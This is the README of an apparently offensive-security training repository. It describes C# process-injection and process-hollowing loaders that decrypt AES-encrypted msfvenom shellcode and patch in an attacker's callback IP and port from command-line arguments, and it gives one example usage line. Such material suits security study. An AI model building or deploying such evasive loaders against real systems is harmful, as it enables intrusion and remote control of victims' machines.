Octoberfest7/OSEP-Tools/README.md

 Clinject and Clhollow:

 These are C# projects that have been modified in order to accept command line Lhost, Lport, and processes for targeting.
 This allows a user to drop the payload on whatever target machine without worry of needing to re-roll shellcode if the attackers IP changes, or the payload needs to be pointed at a different machine in order to hit a tunnel and egress the network.
+This was accomplished by using Msfvenom to create shellcode and then locating the IP and port that was specified in the msfvenom command within the output shellcode.
+These bytes were replaced with unique identifier strings.
+This process was accomplished with the "Port_ipeggs.py" script.
+This shellcode was then AES encrypted and placed in the C# project and functionality added to received command line args specifying the Lport and Lhost.
+On run time, the shellcode is decrypted and then the IP and port given by the attacker is converted to hex and placed in the proper location wthin the decyrpted shellcode as marked by the unique identifer string.

 Example usage: clinject.exe 192.168.1.1 443 explorer